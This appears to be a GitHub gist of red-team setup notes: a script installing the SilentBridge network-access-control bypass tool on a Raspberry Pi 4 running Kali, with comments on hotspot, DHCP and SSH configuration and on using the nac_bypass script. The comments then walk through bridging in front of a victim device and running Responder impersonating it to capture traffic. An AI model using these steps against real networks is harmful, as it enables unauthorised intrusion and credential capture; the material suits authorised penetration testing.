Skip to content

Instantly share code, notes, and snippets.

@l4rm4nd

l4rm4nd/install_silentbridge.sh

Last active July 12, 2025 16:53
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save l4rm4nd/875d4cbacf5a18aa549c87ce9b16cd98 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save l4rm4nd/875d4cbacf5a18aa549c87ce9b16cd98 to your computer and use it in GitHub Desktop.
Download ZIP
SilentBridge on Raspberry Pi 4 (kali-linux-2025.2-raspberry-pi-arm64.img)
Raw
install_silentbridge.sh
# install dependencies for netifaces
sudo apt install python2-dev -y
# get python2 pip
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2.7 get-pip.py
rm get-pip.py
# downgrade virtualenv to support python2.7 venvs
# see https://github.com/pypa/virtualenv/releases/tag/20.22.0 - drops python2.7 support
pip install virtualenv==20.21.1 --break-system-packages --ignore-installed
# clone silentbridge
git clone https://github.com/s0lst1c3/silentbridge && cd silentbridge
# create venv for python2.7
virtualenv -p $(which python2) venv2
source venv2/bin/activate
# install silentbridge dependencies
pip install scapy==2.4.3 --ignore-installed
pip install netifaces
pip install nanpy
# test run silentbridge
python2 ./silentbridge
@l4rm4nd
Copy link
Author

l4rm4nd commented Jun 27, 2025
edited
Loading

From https://luemmelsec.github.io/I-got-99-problems-but-my-NAC-aint-one/

Tip

We use the RPi4's wifi antenna to spawn a hotspot.
The RPi4 will have the IP address 192.168.200.1/32.
SSH password authentication will be allowed from this subnet range only. Otherwise, pubkey auth.

sudo apt-get install isc-dhcp-server
sudo apt-get install hostapd
sudo systemctl enable isc-dhcp-server
sudo systemctl unmask hostapd
sudo systemctl enable hostapd

Then sudo nano /etc/dhcp/dhcpd.conf and put:

default-lease-time 600;
max-lease-time 7200;
subnet 192.168.200.0 netmask 255.255.255.0 {
range 192.168.200.2 192.168.200.100;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.200.255;
}

Then sudo nano /etc/hostapd/hostapd.conf and put:

Caution

Change the wifi hotspot name and credentials!

Warning

If you have already configured wlan0, you have to remove it.
May have been done manually or during usage of Raspberry Pi Imager software.

If so, run sudo rm /etc/netplan/50-cloud-init.yaml and delete connection via nmtui.

interface=wlan0
driver=nl80211
ssid=raspkali_hotspot
hw_mode=g
channel=6
ieee80211n=1
ieee80211d=1
country_code=DE
wme_enabled=1
auth_algs=1
ignore_broadcast_ssid=0
macaddr_acl=0
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=Sup3rS3cr3tW1F1P@ss!

Then validate proper interface name in sudo nano /etc/default/isc-dhcp-server:

INTERFACESv4="wlan0"

We must create a service for isc-dhcp-server to properly start during reboots:

sudo nano /etc/systemd/system/isc-dhcp-server.service

put this in:

[Unit]
Description=ISC DHCP Server
After=network-pre.target
Wants=network-pre.target
Requires=network-pre.target
Requires=sys-subsystem-net-devices-wlan0.device
After=sys-subsystem-net-devices-wlan0.device
After=hostapd.service

[Service]
ExecStart=/etc/init.d/isc-dhcp-server start
ExecStop=/etc/init.d/isc-dhcp-server stop
Type=forking
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

Then:

sudo systemctl daemon-reload
sudo systemctl restart hostapd
sudo systemctl enable isc-dhcp-server
sudo systemctl restart isc-dhcp-server

Also configure SSH properly sudo nano /etc/ssh/sshd_config as follows:

Tip

Make use of AllowUsers or AllowGroups!

Protocol 2
AddressFamily any
Port 22
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server

HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key

# SSH Authentication
UsePAM yes
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no
#PermitRootLogin no
HostbasedAuthentication no
ChallengeResponseAuthentication no
KerberosAuthentication no
GSSAPIAuthentication no
IgnoreRhosts yes

# SSH Authorized Keyfiles
AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2

# SSH Session
TCPKeepAlive yes
ClientAliveInterval 600
ClientAliveCountMax 2
LoginGraceTime 60
MaxAuthTries 3
Compression no

# SSH Information Disclosure
DebianBanner no
PrintMotd no
PrintLastLog yes

# SSH Logging
LogLevel VERBOSE
SyslogFacility AUTH

# SSH Tunneling & Forwarding
AllowAgentForwarding no
AllowTcpForwarding yes
PermitTunnel yes
X11Forwarding no
PermitUserEnvironment no

# SSH File Mode & Ownership Checking
StrictModes yes
#UsePrivilegeSeparation yes # deprecated

# SSH Access Controls - Groups
#AllowGroups ssh
#AllowUsers ssh-user

# SSH Encryption Ciphers
# recommended from https://www.sshaudit.com/hardening_guides.html#ubuntu_20_04_lts
Ciphers [email protected],[email protected],aes256-ctr,aes192-ctr

# SSH Message Authentication Codes (MAC)
# recommended from https://www.sshaudit.com/hardening_guides.html#ubuntu_20_04_lts
MACs [email protected],[email protected]

# SSH Host Key Algorithms
# recommended from https://www.sshaudit.com/hardening_guides.html#ubuntu_20_04_lts
HostKeyAlgorithms ssh-ed25519,[email protected],[email protected],[email protected],rsa-sha2-256,rsa-sha2-512,[email protected],[email protected]

# SSH Key Exchange Algorithms
# recommended from https://www.sshaudit.com/hardening_guides.html#ubuntu_20_04_lts
KexAlgorithms curve25519-sha256,[email protected],diffie-hellman-group16-sha512,diffie-hellman-group18-sha512

# Allow older public key types
#PubkeyAcceptedKeyTypes=+ssh-rsa

# SSH Custom Network Configuration (Internal)
Match Address 192.168.200.0/24
    PasswordAuthentication yes

@l4rm4nd
Copy link
Author

l4rm4nd commented Jun 27, 2025
edited
Loading

From https://github.com/scipag/nac_bypass

# install dependencies
# not needed if you run kali linux
sudo apt-get install -y bridge-utils ethtool macchanger arptables ebtables iptables net-tools tcpdump

# load kernel module
sudo modprobe br_netfilter
# verify its loaded
lsmod | grep br_netfilter

# append to kernel modules
echo br_netfilter | sudo tee -a /etc/modules

# enable ipforwarding
sudo nano /etc/sysctl.conf

# and uncomment/put this line with no hashtag
# net.ipv4.ip_forward = 1

# clone repo
cd
git clone https://github.com/scipag/nac_bypass && nac_bypass

# test run
sudo su
chmod +x nac_bypass_setup.sh
./nac_bypass_setup.sh -h

The actual NAC bypass looks like this:

  1. Connect the switch to eth0 (native LAN interface of RPi4)
  2. Connect victim (e.g. printer) to eth1 (external USB LAN adapter)
  3. Then start the nac bypass:
# by default it will treat the lower interface device as switch side, and the next one as victim
./nac_bypass_setup.sh -1 eth0 -2 eth1

# script will ask to wait some time, so it is able to dump the needed info from the network traffic
# afterwards, you can proceed and for instance do an nmap scan on the network

Warning

As for Responder: Things got a little confusing for me at first.

You can look up the iptables rules like so to see what is going on: iptables -t nat -L

The nac bypass script will put rules in place, that reroute all traffic intended for the client let´s say port 445 to your bridge. So Responder needs to bet set up to listen on the bridge interface, but change the answering IP address to the one of the victim:

./Responder.py -I br0 -e victim.ip

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment